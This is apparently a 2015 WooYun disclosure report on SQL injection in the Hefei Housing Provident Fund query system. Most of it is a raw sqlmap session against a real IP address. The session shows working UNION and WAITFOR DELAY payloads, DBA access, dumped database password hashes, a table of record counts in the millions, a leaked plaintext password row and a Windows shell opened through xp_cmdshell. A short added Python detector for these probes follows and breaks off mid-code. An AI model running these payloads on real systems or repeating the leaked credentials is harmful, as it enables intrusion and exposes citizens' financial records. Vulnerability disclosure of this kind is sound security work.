
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0134350

Title: SQL injection in the Hefei Housing Provident Fund query system (millions of records + interactive system shell)

Vendor: Hefei Housing Provident Fund query system (合肥住房公积金查询)

Author: 路人甲

Submitted: 2015-08-17 18:15

Fixed: 2015-10-03 09:44

Published: 2015-10-03 09:44

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure timeline:

2015-08-17: details sent to the vendor, awaiting vendor handling
2015-08-19: vendor confirmed; details disclosed to the vendor only
2015-08-29: details disclosed to core white hats and domain experts
2015-09-08: details disclosed to regular white hats
2015-09-18: details disclosed to intern white hats
2015-10-03: details disclosed to the public

Summary:

Another reporter has already submitted this endpoint, but a second parameter at the same address is also SQL-injectable, and the one already reported still has not been fixed; it is only a matter of time before it is exploited!

Details:

WooYun: POST injection in the Hefei Housing Provident Fund query system (interactive system shell / affects provident fund users)
One more parameter is injectable, and the one the earlier reporter submitted still has not been fixed, so exploitation still works!
Captured request:

http://220.178.98.86/hfgjj/jsp/web/public/search/getPw.jsp (POST)
zgyhzh=1&xm=2&sjhm=3


[17:02:53] [INFO] parsing HTTP request from 'E:\8.txt'
[17:02:53] [INFO] testing connection to the target URL
[17:02:53] [INFO] testing if the target URL is stable. This can take a couple of
seconds
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] y
[17:02:57] [INFO] target URL is stable
[17:02:57] [INFO] testing if POST parameter 'zgyhzh' is dynamic
[17:02:57] [WARNING] POST parameter 'zgyhzh' does not appear dynamic
[17:02:57] [WARNING] heuristic (basic) test shows that POST parameter 'zgyhzh' m
ight not be injectable
[17:02:57] [INFO] testing for SQL injection on POST parameter 'zgyhzh'
[17:02:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:02:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[17:03:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:03:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[17:03:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[17:03:02] [INFO] testing 'MySQL inline queries'
[17:03:02] [INFO] testing 'PostgreSQL inline queries'
[17:03:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:03:03] [INFO] testing 'Oracle inline queries'
[17:03:03] [INFO] testing 'SQLite inline queries'
[17:03:03] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:03:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[17:03:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:03:16] [INFO] POST parameter 'zgyhzh' seems to be 'Microsoft SQL Server/Syba
se stacked queries' injectable
[17:03:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:03:26] [INFO] POST parameter 'zgyhzh' seems to be 'Microsoft SQL Server/Syba
se time-based blind' injectable
[17:03:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:03:26] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[17:03:27] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[17:03:27] [INFO] target URL appears to have 9 columns in query
[17:03:29] [INFO] POST parameter 'zgyhzh' is 'Generic UNION query (NULL) - 1 to
20 columns' injectable
POST parameter 'zgyhzh' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] y
[17:03:31] [INFO] testing if POST parameter 'xm' is dynamic
[17:03:31] [WARNING] POST parameter 'xm' does not appear dynamic
[17:03:31] [WARNING] heuristic (basic) test shows that POST parameter 'xm' might
not be injectable
[17:03:31] [INFO] testing for SQL injection on POST parameter 'xm'
[17:03:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:03:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[17:03:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:03:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[17:03:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[17:03:38] [INFO] testing 'MySQL inline queries'
[17:03:38] [INFO] testing 'PostgreSQL inline queries'
[17:03:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:03:38] [INFO] testing 'Oracle inline queries'
[17:03:38] [INFO] testing 'SQLite inline queries'
[17:03:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:03:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[17:03:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:03:41] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:03:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[17:03:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:03:44] [INFO] testing 'Oracle AND time-based blind'
[17:03:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[17:03:58] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. --dbms=mysql)
[17:04:12] [INFO] testing 'Generic UNION query (77) - 1 to 10 columns'
[17:04:12] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[17:04:12] [WARNING] applying generic concatenation with double pipes ('||')
[17:04:28] [WARNING] POST parameter 'xm' is not injectable
[17:04:28] [INFO] testing if POST parameter 'sjhm' is dynamic
[17:04:28] [WARNING] POST parameter 'sjhm' does not appear dynamic
[17:04:29] [WARNING] heuristic (basic) test shows that POST parameter 'sjhm' mig
ht not be injectable
[17:04:29] [INFO] testing for SQL injection on POST parameter 'sjhm'
[17:04:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:04:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[17:04:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:04:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[17:04:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[17:04:34] [INFO] testing 'MySQL inline queries'
[17:04:34] [INFO] testing 'PostgreSQL inline queries'
[17:04:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:04:34] [INFO] testing 'Oracle inline queries'
[17:04:34] [INFO] testing 'SQLite inline queries'
[17:04:34] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:04:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[17:04:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:04:47] [INFO] POST parameter 'sjhm' seems to be 'Microsoft SQL Server/Sybase
stacked queries' injectable
[17:04:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:04:57] [INFO] POST parameter 'sjhm' seems to be 'Microsoft SQL Server/Sybase
time-based blind' injectable
[17:04:57] [INFO] testing 'Generic UNION query (77) - 1 to 20 columns'
[17:04:58] [INFO] POST parameter 'sjhm' is 'Generic UNION query (77) - 1 to 20 c
olumns' injectable
POST parameter 'sjhm' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 478 HTTP(s) req
uests:
---
Place: POST
Parameter: zgyhzh
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: zgyhzh=1' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(119)+CHAR(118)+
CHAR(110)+CHAR(113)+CHAR(66)+CHAR(104)+CHAR(78)+CHAR(98)+CHAR(82)+CHAR(119)+CHAR
(118)+CHAR(111)+CHAR(104)+CHAR(99)+CHAR(113)+CHAR(121)+CHAR(106)+CHAR(108)+CHAR(
113),NULL,NULL,NULL,NULL,NULL,NULL-- &xm=2&sjhm=3
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: zgyhzh=1'; WAITFOR DELAY '0:0:5'--&xm=2&sjhm=3
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: zgyhzh=1' WAITFOR DELAY '0:0:5'--&xm=2&sjhm=3
Place: POST
Parameter: sjhm
Type: UNION query
Title: Generic UNION query (77) - 9 columns
Payload: zgyhzh=1&xm=2&sjhm=3' UNION ALL SELECT 77,77,CHAR(113)+CHAR(119)+CH
AR(118)+CHAR(110)+CHAR(113)+CHAR(86)+CHAR(77)+CHAR(112)+CHAR(67)+CHAR(99)+CHAR(7
4)+CHAR(70)+CHAR(100)+CHAR(86)+CHAR(83)+CHAR(113)+CHAR(121)+CHAR(106)+CHAR(108)+
CHAR(113),77,77,77,77,77,77--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: zgyhzh=1&xm=2&sjhm=3'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: zgyhzh=1&xm=2&sjhm=3' WAITFOR DELAY '0:0:5'--
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: zgyhzh, type: Single quoted string (default)
[1] place: POST, parameter: sjhm, type: Single quoted string
[q] Quit
> 0
[17:05:13] [INFO] testing Microsoft SQL Server
[17:05:14] [INFO] confirming Microsoft SQL Server
[17:05:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.22, JSP
back-end DBMS: Microsoft SQL Server 2000
[17:08:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.22, JSP
back-end DBMS: Microsoft SQL Server 2000
[17:08:11] [INFO] fetching current user
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] y
current user: 'sa'
[17:08:14] [INFO] fetching current database
current database: 'hfgjj'
[17:08:14] [INFO] testing if current user is DBA
current user is DBA: True
DBA privileges
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: sjhm, type: Single quoted string (default)
[1] place: POST, parameter: zgyhzh, type: Single quoted string
[q] Quit
> 1
[17:09:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.22, JSP
back-end DBMS: Microsoft SQL Server 2000
[17:09:10] [INFO] fetching current database
current database: 'hfgjj'
[17:09:10] [INFO] fetching database users
[17:09:10] [INFO] the SQL query used returns 4 entries
[17:09:10] [INFO] starting 4 threads
[17:09:10] [INFO] resumed: "12329"
[17:09:10] [INFO] resumed: "sa"
[17:09:10] [INFO] resumed: "BUILTIN\\\\Administrators"
[17:09:10] [INFO] resumed: "hengke"
database management system users [4]:
[*] 12329
[*] BUILTIN\\Administrators
[*] hengke
[*] sa
[17:09:10] [INFO] fetching database users password hashes
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] y
[17:09:12] [INFO] the SQL query used returns 5 entries
[17:09:12] [INFO] starting 5 threads
[17:09:12] [INFO] retrieved: "12329","0x0100f07081700cfaf759e66438ea2f3ba8716...
[17:09:13] [INFO] retrieved: " "," "
[17:09:13] [INFO] retrieved: "BUILTIN\\\\Administrators"," "
[17:09:13] [INFO] retrieved: "hengke","0x0100db4afb45cf379dd1faabfd592a4b6c83...
[17:09:13] [INFO] retrieved: "sa","0x0100d341535b397ce619be87c4a2592e80b579c0...
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hash
es? [Y/n/q] n
database management system users password hashes:
[*] 12329 [1]:
password hash: 0x0100f07081700cfaf759e66438ea2f3ba8716645d9e13d8ddb7e0cfaf75
9e66438ea2f3ba8716645d9e13d8ddb7e
header: 0x0100
salt: f0708170
mixedcase: 0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e
uppercase: 0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e
[*] BUILTIN\\Administrators [1]:
password hash: NULL
[*] hengke [1]:
password hash: 0x0100db4afb45cf379dd1faabfd592a4b6c83d0b56e1c1d599309ba0ec5c
2775dace3924d902c8041900c6b0df944
header: 0x0100
salt: db4afb45
mixedcase: cf379dd1faabfd592a4b6c83d0b56e1c1d599309
uppercase: ba0ec5c2775dace3924d902c8041900c6b0df944
[*] sa [1]:
password hash: 0x0100d341535b397ce619be87c4a2592e80b579c006713a72aacc606f04f
250d80f97cd3d5f7c97fcaad96fba05ae
header: 0x0100
salt: d341535b
mixedcase: 397ce619be87c4a2592e80b579c006713a72aacc
uppercase: 606f04f250d80f97cd3d5f7c97fcaad96fba05ae
[17:10:12] [INFO] the SQL query used returns 7 entries
[17:10:12] [INFO] starting 7 threads
[17:10:12] [INFO] retrieved: "msdb"
[17:10:12] [INFO] retrieved: "hfgjj"
[17:10:12] [INFO] retrieved: "master"
[17:10:12] [INFO] retrieved: "hengke"
[17:10:12] [INFO] retrieved: "gjj"
[17:10:12] [INFO] retrieved: "model"
[17:10:12] [INFO] retrieved: "tempdb"
available databases [7]:
[*] gjj
[*] hengke
[*] hfgjj
[*] master
[*] model
[*] msdb
[*] tempdb
[17:10:56] [INFO] the SQL query used returns 109 entries
[17:10:56] [INFO] starting 10 threads
[17:10:56] [INFO] retrieved: "dbo.cms_hdjl"
[17:10:56] [INFO] retrieved: "dbo.D99_REG"
[17:10:57] [INFO] retrieved: "dbo.advise_upload"
[17:10:57] [INFO] retrieved: "dbo.class_supply"
[17:10:57] [INFO] retrieved: "dbo.culture_info"
[17:10:57] [INFO] retrieved: "dbo.CULTURE_INVESTDETAIL"
[17:10:57] [INFO] retrieved: "dbo.dtproperties"
[17:10:58] [INFO] retrieved: "dbo.D99_CMD"
[17:10:58] [INFO] retrieved: "dbo.DIY_TEMPTALBLE"
[17:10:58] [INFO] retrieved: "dbo.h_fangjian"
[17:10:58] [INFO] retrieved: "dbo.fellow_link"
[17:10:58] [INFO] retrieved: "dbo.culture_replyinfo"
[17:10:58] [INFO] retrieved: "dbo.fellow_class"
[17:10:58] [INFO] retrieved: "dbo.h_loudong"
[17:10:58] [INFO] retrieved: "dbo.fagui"
[17:10:58] [INFO] retrieved: "dbo.focus_user"
[17:10:59] [INFO] retrieved: "dbo.hdzx"
[17:10:59] [INFO] retrieved: "dbo.CULTURE_INVESTED"
[17:10:59] [INFO] retrieved: "dbo.D99_Tmp"
[17:10:59] [INFO] retrieved: "dbo.join_table"
[17:10:59] [INFO] retrieved: "dbo.h_quyu"
[17:10:59] [INFO] retrieved: "dbo.mail_material"
[17:11:00] [INFO] retrieved: "dbo.INNER_INFO"
[17:11:00] [INFO] retrieved: "dbo.kill_kk"
[17:11:00] [INFO] retrieved: "dbo.pbcatfmt"
[17:11:00] [INFO] retrieved: "dbo.pbcattbl"
[17:11:00] [INFO] retrieved: "dbo.pbcatcol"
[17:11:01] [INFO] retrieved: "dbo.pbcatvld"
[17:11:01] [INFO] retrieved: "dbo.sqlmapoutput"
[17:11:01] [INFO] retrieved: "dbo.renyuan_dw"
[17:11:01] [INFO] retrieved: "dbo.sys_log"
[17:11:01] [INFO] retrieved: "dbo.SYS_MENU"
[17:11:02] [INFO] retrieved: "dbo.supply_note"
[17:11:02] [INFO] retrieved: "dbo.sys_role_resource"
[17:11:02] [INFO] retrieved: "dbo.sys_siteprevilige"
[17:11:02] [INFO] retrieved: "dbo.sys_role_resource"
[17:11:02] [INFO] retrieved: "dbo.sys_resource"
[17:11:03] [INFO] retrieved: "dbo.sys_unit_role"
[17:11:03] [INFO] retrieved: "dbo.sys_siteprevilige"
[17:11:03] [INFO] retrieved: "dbo.sys_unittype"
[17:11:03] [INFO] retrieved: "dbo.sys_unit_role"
[17:11:03] [INFO] retrieved: "dbo.SYS_SITERIGHT"
[17:11:03] [INFO] retrieved: "dbo.LIFA_NEWS"
[17:11:04] [INFO] retrieved: "dbo.sys_userproperty"
[17:11:04] [INFO] retrieved: "dbo.pbcatedt"
[17:11:04] [INFO] retrieved: "dbo.SYS_USERGROUP"
[17:11:04] [INFO] retrieved: "dbo.sys_user_role"
[17:11:05] [INFO] retrieved: "dbo.renyuan_dw"
[17:11:05] [INFO] retrieved: "dbo.sys_user_role"
[17:11:05] [INFO] retrieved: "dbo.sys_user_unit"
[17:11:05] [INFO] retrieved: "dbo.tongji"
[17:11:05] [INFO] retrieved: "dbo.syssegments"
[17:11:05] [INFO] retrieved: "dbo.supply_replynote"
[17:11:06] [INFO] retrieved: "dbo.v_168_dwhjqk_old"
[17:11:06] [INFO] retrieved: "dbo.tz_js"
[17:11:06] [INFO] retrieved: "dbo.tz_note"
[17:11:06] [INFO] retrieved: "dbo.v_168_dwhjqk_old"
[17:11:06] [INFO] retrieved: "dbo.v_09_10_xh"
[17:11:06] [INFO] retrieved: "dbo.v_168_dz_old_61"
[17:11:07] [INFO] retrieved: "dbo.v_168_dwzz_old"
[17:11:07] [INFO] retrieved: "dbo.v_168_dwinfo"
[17:11:07] [INFO] retrieved: "dbo.v_168_dwzz_old"
[17:11:07] [INFO] retrieved: "dbo.v_168_dz_old_61"
[17:11:07] [INFO] retrieved: "dbo.v_168_dwdz"
[17:11:07] [INFO] retrieved: "dbo.v_168_dz_old_65"
[17:11:08] [INFO] retrieved: "dbo.v_168_dz_old_67"
[17:11:08] [INFO] retrieved: "dbo.v_168_dz_old_66"
[17:11:08] [INFO] retrieved: "dbo.hero_table"
[17:11:08] [INFO] retrieved: "dbo.v_168_dz1"
[17:11:09] [INFO] retrieved: "dbo.v_168_dz_old_68"
[17:11:09] [INFO] retrieved: "dbo.v_168_dz_old_yl"
[17:11:09] [INFO] retrieved: "dbo.v_168_dz2"
[17:11:09] [INFO] retrieved: "dbo.v_168_gjd"
[17:11:09] [INFO] retrieved: "dbo.v_dw_gzmx"
[17:11:09] [INFO] retrieved: "dbo.v_dw_gjmx_old"
[17:11:09] [INFO] retrieved: "dbo.v_dwhjqk_old"
[17:11:10] [INFO] retrieved: "dbo.v_dwhjqk_old"
[17:11:10] [INFO] retrieved: "dbo.v_168_info_old"
[17:11:10] [INFO] retrieved: "dbo.v_update_Time"
[17:11:10] [INFO] retrieved: "dbo.v_save_etps_password"
[17:11:10] [INFO] retrieved: "dbo.v_save_password"
[17:11:11] [INFO] retrieved: "dbo.v_168_info_old"
[17:11:11] [INFO] retrieved: "dbo.v_web_hdmx"
[17:11:11] [INFO] retrieved: "dbo.v_house_info"
[17:11:11] [INFO] retrieved: "dbo.v_web_hdqk1"
[17:11:11] [INFO] retrieved: "dbo.v_web_hdqk1"
[17:11:11] [INFO] retrieved: "dbo.v_web_sdqk"
[17:11:12] [INFO] retrieved: "dbo.v_web_shgc"
[17:11:12] [INFO] retrieved: "dbo.v_dwzz_old"
[17:11:12] [INFO] retrieved: "dbo.v_web_wtmx11"
[17:11:12] [INFO] retrieved: "dbo.v_web_wtmx10"
[17:11:13] [INFO] retrieved: "dbo.v_web_wtmx12"
[17:11:13] [INFO] retrieved: "dbo.v_web_wttqmx_old"
[17:11:13] [INFO] retrieved: "dbo.v_web_wttqmx_old"
[17:11:13] [INFO] retrieved: "dbo.web_dwinfo"
[17:11:13] [INFO] retrieved: "dbo.v_web_wttqmx_old"
[17:11:13] [INFO] retrieved: "dbo.xzsp_dw"
[17:11:13] [INFO] retrieved: "dbo.v_web_wtmx09"
[17:11:13] [INFO] retrieved: "dbo.WELFARE_NEWS"
[17:11:14] [INFO] retrieved: "dbo.sysconstraints"
[17:11:14] [INFO] retrieved: "dbo.zxbs"
[17:11:14] [INFO] retrieved: "dbo.zhut"
[17:11:15] [WARNING] cannot properly display Unicode characters inside Windows
OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances
will result in replacement with '?' character. Please, find proper character
representation inside corresponding output files.
[17:11:15] [INFO] retrieved: "dbo.??"
[17:11:15] [INFO] retrieved: "dbo.wenjian"
[17:11:15] [INFO] retrieved: "dbo.xzsp_dw"
[17:11:15] [INFO] retrieved: "dbo.xzxk"
[17:11:16] [INFO] retrieved: "dbo.v_168_dz_old_61"
[17:11:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is
going to retry the request
[17:11:16] [WARNING] if the problem persists please try to lower the number of
used threads (option '--threads')
[17:11:18] [INFO] retrieved: "dbo.h_loupan"
[17:11:18] [INFO] retrieved: "dbo.v_dw_gjmx_old"
Database: hfgjj
[109 tables]
+----------------------+
| CULTURE_INVESTDETAIL |
| CULTURE_INVESTED |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| DIY_TEMPTALBLE |
| INNER_INFO |
| LIFA_NEWS |
| SYS_MENU |
| SYS_SITERIGHT |
| SYS_USERGROUP |
| WELFARE_NEWS |
| advise_upload |
| class_supply |
| cms_hdjl |
| culture_info |
| culture_replyinfo |
| dtproperties |
| fagui |
| fellow_class |
| fellow_link |
| focus_user |
| h_fangjian |
| h_loudong |
| h_loupan |
| h_quyu |
| hdzx |
| hero_table |
| join_table |
| kill_kk |
| mail_material |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| renyuan_dw |
| renyuan_dw |
| sqlmapoutput |
| supply_note |
| supply_replynote |
| sys_log |
| sys_resource |
| sys_role_resource |
| sys_role_resource |
| sys_siteprevilige |
| sys_siteprevilige |
| sys_unit_role |
| sys_unit_role |
| sys_unittype |
| sys_user_role |
| sys_user_role |
| sys_user_unit |
| sys_userproperty |
| sysconstraints |
| syssegments |
| tongji |
| tz_js |
| tz_note |
| v_09_10_xh |
| v_168_dwdz |
| v_168_dwhjqk_old |
| v_168_dwhjqk_old |
| v_168_dwinfo |
| v_168_dwzz_old |
| v_168_dwzz_old |
| v_168_dz1 |
| v_168_dz2 |
| v_168_dz_old_61 |
| v_168_dz_old_61 |
| v_168_dz_old_61 |
| v_168_dz_old_65 |
| v_168_dz_old_66 |
| v_168_dz_old_67 |
| v_168_dz_old_68 |
| v_168_dz_old_yl |
| v_168_gjd |
| v_168_info_old |
| v_168_info_old |
| v_dw_gjmx_old |
| v_dw_gjmx_old |
| v_dw_gzmx |
| v_dwhjqk_old |
| v_dwhjqk_old |
| v_dwzz_old |
| v_house_info |
| v_save_etps_password |
| v_save_password |
| v_update_Time |
| v_web_hdmx |
| v_web_hdqk1 |
| v_web_hdqk1 |
| v_web_sdqk |
| v_web_shgc |
| v_web_wtmx09 |
| v_web_wtmx10 |
| v_web_wtmx11 |
| v_web_wtmx12 |
| v_web_wttqmx_old |
| v_web_wttqmx_old |
| v_web_wttqmx_old |
| web_dwinfo |
| wenjian |
| xzsp_dw |
| xzsp_dw |
| xzxk |
| zhut |
| zxbs |
| ?? |
+----------------------+
Database: hfgjj
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| dbo.v_168_dz1 | 7603650 |
| dbo.v_web_hdmx | 6436608 |
| dbo.v_dw_gjmx_old | 1220549 |
| dbo.v_dw_gjmx_old | 1220549 |
| dbo.v_web_wttqmx_old | 1071690 |
| dbo.v_web_wttqmx_old | 1071690 |
| dbo.v_web_wttqmx_old | 1071690 |
| dbo.v_save_password | 895507 |
| dbo.v_web_shgc | 497282 |
| dbo.v_168_dwhjqk_old | 441669 |
| dbo.v_168_dwhjqk_old | 441669 |
| dbo.v_dwhjqk_old | 438713 |
| dbo.v_dwhjqk_old | 438713 |
| dbo.v_168_dz_old_yl | 424834 |
| dbo.v_168_info_old | 374905 |
| dbo.v_168_info_old | 374905 |
| dbo.v_web_wtmx12 | 238842 |
| dbo.v_168_dwzz_old | 165814 |
| dbo.v_168_dwzz_old | 165814 |
| dbo.v_168_dz2 | 147125 |
| dbo.v_web_wtmx10 | 120510 |
| dbo.v_web_wtmx11 | 89190 |
| dbo.v_dw_gzmx | 76545 |
| dbo.v_dwzz_old | 76088 |
| dbo.v_09_10_xh | 59814 |
| dbo.v_web_wtmx09 | 34592 |
| dbo.v_web_hdqk1 | 29389 |
| dbo.v_web_hdqk1 | 29389 |
| dbo.sys_log | 24920 |
| dbo.hdzx | 11659 |
| dbo.v_168_dwinfo | 10587 |
| dbo.v_house_info | 9579 |
| dbo.v_save_etps_password | 7666 |
| dbo.v_web_sdqk | 4741 |
| dbo.tongji | 4323 |
| dbo.web_dwinfo | 3387 |
| dbo.v_168_dwdz | 1043 |
| dbo.cms_hdjl | 464 |
| dbo.SYS_SITERIGHT | 360 |
| dbo.WELFARE_NEWS | 257 |
| dbo.sys_role_resource | 192 |
| dbo.sys_role_resource | 192 |
| dbo.fagui | 102 |
| dbo.wenjian | 74 |
| dbo.supply_note | 69 |
| dbo.sys_resource | 60 |
| dbo.sys_user_role | 47 |
| dbo.sys_user_role | 47 |
| dbo.xzsp_dw | 39 |
| dbo.xzsp_dw | 39 |
| dbo.SYS_MENU | 38 |
| dbo.mail_material | 34 |
| dbo.supply_replynote | 34 |
| dbo.sysconstraints | 34 |
| dbo.focus_user | 30 |
| dbo.pbcatcol | 29 |
| dbo.kill_kk | 21 |
| dbo.pbcatedt | 21 |
| dbo.DIY_TEMPTALBLE | 20 |
| dbo.pbcatfmt | 20 |
| dbo.CULTURE_INVESTDETAIL | 13 |
| dbo.D99_CMD | 12 |
| dbo.hero_table | 12 |
| dbo.sys_user_unit | 8 |
| dbo.h_quyu | 7 |
| dbo.advise_upload | 6 |
| dbo.xzxk | 6 |
| dbo.v_168_gjd | 5 |
| dbo.INNER_INFO | 4 |
| dbo.renyuan_dw | 4 |
| dbo.renyuan_dw | 4 |
| dbo.class_supply | 3 |
| dbo.sqlmapoutput | 3 |
| dbo.sys_unittype | 3 |
| dbo.syssegments | 3 |
| dbo.zxbs | 3 |
| dbo.CULTURE_INVESTED | 2 |
| dbo.D99_Tmp | 2 |
| dbo.fellow_class | 2 |
| dbo.fellow_link | 2 |
| dbo.h_loupan | 2 |
| dbo.pbcattbl | 2 |
| dbo.tz_js | 2 |
| dbo.tz_note | 2 |
| dbo.D99_REG | 1 |
| dbo.h_loudong | 1 |
| dbo.LIFA_NEWS | 1 |
| dbo.sys_siteprevilige | 1 |
| dbo.sys_siteprevilige | 1 |
| dbo.v_update_Time | 1 |
+--------------------------+---------+
The millions of records above can be leaked!
Database: hfgjj
Table: v_save_password
[1 entry]
+-------------+------+--------------------+-------+-----------+-----------+---------+---------+----------+
| sjhm        | dxjs | ftime              | allIn | dwyhzh    | zgyhzh    | todayIn | enabled | password |
+-------------+------+--------------------+-------+-----------+-----------+---------+---------+----------+
| null        | 0    | 12 31 2014 12:58PM | 99    | 888880003 | 800978023 | 9       | NULL    | s082812  |
+-------------+------+--------------------+-------+-----------+-----------+---------+---------+----------+
[17:21:09] [INFO] fingerprinting the back-end DBMS operating system version and
service pack
[17:21:09] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[17:21:11] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[17:21:13] [INFO] the back-end DBMS operating system is Windows 2000 Service Pac
k 0
[17:21:13] [INFO] testing if current user is DBA
[17:21:13] [INFO] checking if xp_cmdshell extended procedure is available, pleas
e wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[17:21:33] [INFO] xp_cmdshell extended procedure is available
[17:21:33] [INFO] testing if xp_cmdshell extended procedure is usable
[17:21:35] [INFO] the SQL query used returns 1 entries
[17:21:35] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[17:21:35] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[17:21:51] [INFO] adjusting time delay to 4 seconds due to good response times
[17:22:20] [INFO] xp_cmdshell extended procedure is usable
[17:22:20] [INFO] going to use xp_cmdshell extended procedure for operating syst
em command execution
[17:22:20] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press EN
TER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] y
[17:22:31] [INFO] the SQL query used returns 12 entries
[17:22:31] [INFO] starting 10 threads
[17:22:32] [INFO] retrieved: 14
[17:22:41] [INFO] retrieved:
[17:22:46] [INFO] adjusting time delay to 3 seconds due to good response times
[17:22:51] [INFO] retrieved: Windows 2000 IP Configuration
[17:29:37] [INFO] retrieved:
[17:29:45] [INFO] retrieved: Ethernet a
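
The detection logic below is an added example, not part of the report or of the Hefei system: it flags, in form-encoded POST bodies, the three probe shapes sqlmap confirmed in the log above (UNION with CHAR() concatenation, stacked WAITFOR DELAY, and time-based WAITFOR DELAY) and additionally allow-lists the expected format of the three parameters. The parameter names zgyhzh, xm and sjhm come from the report; the field formats (account number as digits, 11-digit mobile number, a name of letters or CJK characters), the signature labels and the sample traffic are assumptions constructed for the example.

```python
# Added example (not from the WooYun report): flag SQL-injection probes in
# form-encoded POST bodies to a getPw.jsp-style endpoint. Parameter names
# zgyhzh/xm/sjhm are taken from the report; the allow-list formats and the
# sample traffic below are constructed assumptions.
import re
from urllib.parse import parse_qs

# Assumed field semantics: zgyhzh = account number, sjhm = mobile number,
# xm = real name. Anything outside these shapes is flagged before it reaches SQL.
FIELD_FORMATS = {
    "zgyhzh": re.compile(r"^\d{6,20}$"),
    "sjhm": re.compile(r"^\d{11}$"),
    "xm": re.compile(r"^[A-Za-z\u4e00-\u9fff·]{1,30}$"),
}

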